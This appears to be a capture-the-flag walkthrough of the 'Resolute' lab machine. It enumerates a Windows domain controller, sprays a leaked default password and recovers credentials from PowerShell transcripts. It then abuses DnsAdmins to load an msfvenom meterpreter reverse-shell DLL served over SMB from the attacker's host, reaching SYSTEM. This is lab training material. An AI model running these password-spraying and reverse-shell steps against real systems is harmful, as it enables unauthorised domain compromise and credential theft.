Resolute
Recon
DNS
└─$ dig ANY megabank.local @10.129.96.155 +timeout=99 +tcp
; <<>> DiG 9.19.21-1-Debian <<>> ANY megabank.local @10.129.96.155 +timeout=99 +tcp
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3036
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;megabank.local. IN ANY
;; ANSWER SECTION:
megabank.local. 600 IN A 10.10.10.169
megabank.local. 3600 IN NS resolute.megabank.local.
megabank.local. 3600 IN SOA resolute.megabank.local. hostmaster.megabank.local. 154 900 600 86400 3600
megabank.local. 600 IN AAAA dead:beef::b803:885a:b665:b183
;; ADDITIONAL SECTION:
resolute.megabank.local. 3600 IN A 10.129.96.155
;; Query time: 255 msec
;; SERVER: 10.129.96.155#53(10.129.96.155) (TCP)
;; WHEN: Wed Nov 27 10:26:39 EST 2024
;; MSG SIZE rcvd: 173Enum4Linux
└─$ enum4linux-ng resolute.megabank.local | tee enum4linux.log
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... resolute.megabank.local
[*] Username ......... ''
[*] Random Username .. 'wqbewllw'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
================================================
| Listener Scan on resolute.megabank.local |
================================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
===============================================================
| Domain Information via LDAP for resolute.megabank.local |
===============================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: megabank.local
======================================================================
| NetBIOS Names and Workgroup/Domain for resolute.megabank.local |
======================================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
====================================================
| SMB Dialect Check on resolute.megabank.local |
====================================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
======================================================================
| Domain Information via SMB session for resolute.megabank.local |
======================================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: RESOLUTE
NetBIOS domain name: MEGABANK
DNS domain: megabank.local
FQDN: Resolute.megabank.local
Derived membership: domain member
Derived domain: MEGABANK
====================================================
| RPC Session Check on resolute.megabank.local |
====================================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
==============================================================
| Domain Information via RPC for resolute.megabank.local |
==============================================================
[+] Domain: MEGABANK
[+] Domain SID: S-1-5-21-1392959593-3013219662-3596683436
[+] Membership: domain member
==========================================================
| OS Information via RPC for resolute.megabank.local |
==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows Server 2016 Standard 14393
OS version: '10.0'
OS release: '1607'
OS build: '14393'
Native OS: Windows Server 2016 Standard 14393
Native LAN manager: Windows Server 2016 Standard 6.3
Platform id: null
Server type: null
Server type string: null
================================================
| Users via RPC on resolute.megabank.local |
================================================
[*] Enumerating users via 'querydispinfo'
[+] Found 27 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 27 user(s) via 'enumdomusers'
[+] After merging user results we have 27 user(s) total:
'10101':
username: melanie
name: (null)
acb: '0x00000010'
description: (null)
'10102':
username: zach
name: (null)
acb: '0x00000010'
description: (null)
'10103':
username: simon
name: (null)
acb: '0x00000010'
description: (null)
'10104':
username: naoki
name: (null)
acb: '0x00000010'
description: (null)
'1105':
username: ryan
name: Ryan Bertrand
acb: '0x00000210'
description: (null)
'1111':
username: marko
name: Marko Novak
acb: '0x00000210'
description: Account created. Password set to Welcome123!
'500':
username: Administrator
name: (null)
acb: '0x00000210'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000215'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00000011'
description: Key Distribution Center Service Account
'503':
username: DefaultAccount
name: (null)
acb: '0x00000215'
description: A user account managed by the system.
'6601':
username: sunita
name: (null)
acb: '0x00000010'
description: (null)
'6602':
username: abigail
name: (null)
acb: '0x00000010'
description: (null)
'6603':
username: marcus
name: (null)
acb: '0x00000010'
description: (null)
'6604':
username: sally
name: (null)
acb: '0x00000010'
description: (null)
'6605':
username: fred
name: (null)
acb: '0x00000010'
description: (null)
'6606':
username: angela
name: (null)
acb: '0x00000010'
description: (null)
'6607':
username: felicia
name: (null)
acb: '0x00000010'
description: (null)
'6608':
username: gustavo
name: (null)
acb: '0x00000010'
description: (null)
'6609':
username: ulf
name: (null)
acb: '0x00000010'
description: (null)
'6610':
username: stevie
name: (null)
acb: '0x00000010'
description: (null)
'6611':
username: claire
name: (null)
acb: '0x00000010'
description: (null)
'6612':
username: paulo
name: (null)
acb: '0x00000010'
description: (null)
'6613':
username: steve
name: (null)
acb: '0x00000010'
description: (null)
'6614':
username: annette
name: (null)
acb: '0x00000010'
description: (null)
'6615':
username: annika
name: (null)
acb: '0x00000010'
description: (null)
'6616':
username: per
name: (null)
acb: '0x00000010'
description: (null)
'6617':
username: claude
name: (null)
acb: '0x00000010'
description: (null)
=================================================
| Groups via RPC on resolute.megabank.local |
=================================================
[*] Enumerating local groups
[+] Found 5 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 29 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 16 group(s) via 'enumdomgroups'
[+] After merging groups results we have 50 group(s) total:
'1101':
groupname: DnsAdmins
type: local
'1102':
groupname: DnsUpdateProxy
type: domain
'1103':
groupname: Contractors
type: domain
'498':
groupname: Enterprise Read-only Domain Controllers
type: domain
'512':
groupname: Domain Admins
type: domain
'513':
groupname: Domain Users
type: domain
'514':
groupname: Domain Guests
type: domain
'515':
groupname: Domain Computers
type: domain
'516':
groupname: Domain Controllers
type: domain
'517':
groupname: Cert Publishers
type: local
'518':
groupname: Schema Admins
type: domain
'519':
groupname: Enterprise Admins
type: domain
'520':
groupname: Group Policy Creator Owners
type: domain
'521':
groupname: Read-only Domain Controllers
type: domain
'522':
groupname: Cloneable Domain Controllers
type: domain
'525':
groupname: Protected Users
type: domain
'526':
groupname: Key Admins
type: domain
'527':
groupname: Enterprise Key Admins
type: domain
'544':
groupname: Administrators
type: builtin
'545':
groupname: Users
type: builtin
'546':
groupname: Guests
type: builtin
'548':
groupname: Account Operators
type: builtin
'549':
groupname: Server Operators
type: builtin
'550':
groupname: Print Operators
type: builtin
'551':
groupname: Backup Operators
type: builtin
'552':
groupname: Replicator
type: builtin
'553':
groupname: RAS and IAS Servers
type: local
'554':
groupname: Pre-Windows 2000 Compatible Access
type: builtin
'555':
groupname: Remote Desktop Users
type: builtin
'556':
groupname: Network Configuration Operators
type: builtin
'557':
groupname: Incoming Forest Trust Builders
type: builtin
'558':
groupname: Performance Monitor Users
type: builtin
'559':
groupname: Performance Log Users
type: builtin
'560':
groupname: Windows Authorization Access Group
type: builtin
'561':
groupname: Terminal Server License Servers
type: builtin
'562':
groupname: Distributed COM Users
type: builtin
'568':
groupname: IIS_IUSRS
type: builtin
'569':
groupname: Cryptographic Operators
type: builtin
'571':
groupname: Allowed RODC Password Replication Group
type: local
'572':
groupname: Denied RODC Password Replication Group
type: local
'573':
groupname: Event Log Readers
type: builtin
'574':
groupname: Certificate Service DCOM Access
type: builtin
'575':
groupname: RDS Remote Access Servers
type: builtin
'576':
groupname: RDS Endpoint Servers
type: builtin
'577':
groupname: RDS Management Servers
type: builtin
'578':
groupname: Hyper-V Administrators
type: builtin
'579':
groupname: Access Control Assistance Operators
type: builtin
'580':
groupname: Remote Management Users
type: builtin
'581':
groupname: System Managed Accounts Group
type: builtin
'582':
groupname: Storage Replica Administrators
type: builtin
=================================================
| Shares via RPC on resolute.megabank.local |
=================================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
====================================================
| Policies via RPC for resolute.megabank.local |
====================================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: not set
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
====================================================
| Printers via RPC for resolute.megabank.local |
====================================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 20.93 secondsSMB
There seems to be marko user with default password in LDAP description.
'1111':
username: marko
name: Marko Novak
acb: '0x00000210'
description: Account created. Password set to Welcome123!└─$ grep username: enum4linux.log | awk '{print($2)}' > username.txt
└─$ netexec smb 10.129.96.155 -u username.txt -p 'Welcome123!' --continue-on-success
SMB 10.129.96.155 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.129.96.155 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURECreds:
melanie:Welcome123!
WinRM
└─$ netexec winrm 10.129.96.155 -u 'melanie' -p 'Welcome123!'
WINRM 10.129.96.155 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM 10.129.96.155 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)User.txt
*Evil-WinRM* PS C:\Users\melanie\Documents> ls -path $ENV:USERPROFILE -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }
Directory: C:\Users\melanie\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/27/2024 7:30 AM 34 user.txt
4fd87ff78a1d48ddcdd8b6da08d39d0dPrivilege Escalation (ryan)
Hmm... nothing useable...
*Evil-WinRM* PS C:\Users\melanie\Music> curl 10.10.14.99/wp.exe -out wp.exe
*Evil-WinRM* PS C:\Users\melanie\Music> .\wp.exe | tee -filepath wp.log
...Also nothing is /Program Files*, but if we got to root (/) and list all files/directories we notice unusual folder PSTranscripts which winpeas didn't find..
*Evil-WinRM* PS C:\> ls -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 11/27/2024 7:54 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 11/27/2024 7:29 AM 402653184 pagefile.sys
*Evil-WinRM* PS C:\PSTranscripts> ls /PSTranscripts -force -rec | % { $_.FullName }
C:\PSTranscripts\20191203
C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
*Evil-WinRM* PS C:\PSTranscripts> ls /PSTranscripts -force -rec -fil *.txt | cat
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************Privilege Escalation (Administrator)
Creds:
ryan:Serv3r4Admin4cc123!
└─$ evil-winrm -i 10.129.96.155 -u 'ryan' -p 'Serv3r4Admin4cc123!'
*Evil-WinRM* PS C:\Users\ryan> ls -path $ENV:USERPROFILE -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }
Directory: C:\Users\ryan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt
Email to team:
- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute*Evil-WinRM* PS C:\Users\ryan> whoami /all
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledEnumerate AD
└─$ cicada-mastertul -t 10.129.96.155 -u 'ryan' -p 'Serv3r4Admin4cc123!' -d megabank.local
----------------------------------------------------
Target IP: 10.129.96.155
Domain: megabank.local
Username: ryan
Password: Serv3r4Admin4cc123!
Full Mode Enabled
----------------------------------------------------
--------------------HAPPY HAUNTING!!----------------
---------------------------------------------------------------------------------------
[!x!] Scanning 10.129.96.155
[!] Enumerating SMB...
[+] SMB share drive names saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/smb_results/smb/share_names.txt
[+] SMB share drives list saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/smb_results/share_drives.txt
[*] Downloading SMB share files to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/smb_results/smb
[!] Connecting to WinRM...
[+] Connected to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/ldap_results
[!x!] Cleaning up...There seems to be second workstation on domain.
DnsAdmin
I thought the DnsAdmins group was local to domain itself, but turns out it's builtin role for AD. https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#dnsadmins
Members of the DnsAdmins group have access to network DNS information. The default permissions are Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group exists only if the DNS server role is or was once installed on a domain controller in the domain.
Tennable: DnsAdmins ExploitationRedTeamNotes: From DnsAdmins to SYSTEM to Domain CompromiseDNSAdmin-DLL
└─$ curl -LOs https://github.com/kazkansouh/DNSAdmin-DLL/archive/refs/heads/master.zip
---
*Evil-WinRM* PS C:\Users\ryan\Music> curl 10.10.14.99/master.zip -outfile master.zip
*Evil-WinRM* PS C:\Users\ryan\Music> Expand-Archive master.zip
*Evil-WinRM* PS C:\Users\ryan\Music> cd master\DNSAdmin-DLL-master\DNSAdmin-DLL
*Evil-WinRM* PS C:\Users\ryan\Music\master\DNSAdmin-DLL-master\DNSAdmin-DLL> (ls / -rec -file -fil 'cl.exe' -erroraction silent).FullName
C:\Windows\WinSxS\amd64_microsoft-windows-wid-xtp_31bf3856ad364e35_10.0.14393.0_none_000422d4a08d9f88\cl.exe
*Evil-WinRM* PS C:\Users\ryan\Music\master\DNSAdmin-DLL-master\DNSAdmin-DLL> C:\Windows\WinSxS\amd64_microsoft-windows-wid-xtp_31bf3856ad364e35_10.0.14393.0_none_000422d4a08d9f88\cl.exe /EHsc dllmain.cpp
Program 'cl.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ C:\Windows\WinSxS\amd64_microsoft-windows-wid-xtp_31bf3856ad364e35_10 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ C:\Windows\WinSxS\amd64_microsoft-windows-wid-xtp_31bf3856ad364e35_10 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailedOh well.. I tried compiling the application on victim, but no success.
MSF: DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o rev.exe
---
*Evil-WinRM* PS C:\Users\ryan\Music> curl 10.10.14.99/rev.exe -outfile rev.exe
---
└─$ msfconsole -q
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > run
---
*Evil-WinRM* PS C:\Users\ryan\Music> .\rev.exewinpeas reported that AV was not found, but file kept getting deleted... Doesn't make sense, because winpeas should also have been removed.
Turns out we don't need to compile the previous project, we can use msf (hopefully)https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/privilege-escalation/dnsadmin
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f dll -o rev.dll
---
*Evil-WinRM* PS C:\Users\ryan\Music> curl 10.10.14.99/rev.dll -outfile rev.dllBinary still get's deleted, but we can try using DLL from smb.
└─$ impacket-smbserver -smb2support letmein ./www
---
# Change port on MSF
[-] run: Interrupted
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
---
*Evil-WinRM* PS C:\Users\ryan\Music> dnscmd.exe Resolute /config /serverlevelplugindll \\10.10.14.99\letmein\rev.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\Music> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
*Evil-WinRM* PS C:\Users\ryan\Music> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3720
FLAGS :
---
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3380 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd /Users
cd /Users
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 0000005D D1AC:5AF6
C:.
+---Contacts
+---Desktop
| root.txt
|
+---Documents
| | revert.ps1
| | subinacl.exe
| | users.txt
| |
| \---WindowsPowerShell
| \---Scripts
| \---InstalledScriptInfos
+---Downloads
| Autologon.exe
|
+---Favorites
+---Links
+---Music
+---Pictures
+---Saved Games
+---Searches
\---VideosRoot.txt
C:\Users\Administrator>type Desktop\root.txt
d4472a024536ff154097aab3d8312f42Last updated